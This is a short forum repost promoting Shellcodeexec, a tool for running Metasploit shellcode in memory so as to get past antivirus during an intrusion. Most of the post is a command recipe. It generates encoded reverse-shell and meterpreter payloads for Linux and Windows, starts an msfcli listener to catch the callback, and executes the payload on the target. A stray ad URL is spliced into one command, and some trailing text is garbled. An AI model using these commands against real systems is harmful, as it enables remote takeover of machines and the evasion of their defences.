![]() |
Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:
The author presents perfect examples to run the tool. We have listed them as under: 1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: 1 $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX Or for a Windows target: 1 $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX 2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: 1 $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E http://www.burstnet.com/cgi-bin/ads/...3S/sz=468x60B/ Or for a Windows target: 1 $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E 3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: 1 $ ./shellcodeexec <msfencode's alphanumeric-encoded payload> Or, on the Windows target: 1 C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload> Download shellcodeexec (inquisb-shellcodeexec.zip) here. |
ÇáÓÇÚÉ ÇáÂä 03:26 PM |
[ vBspiders.Com Network ]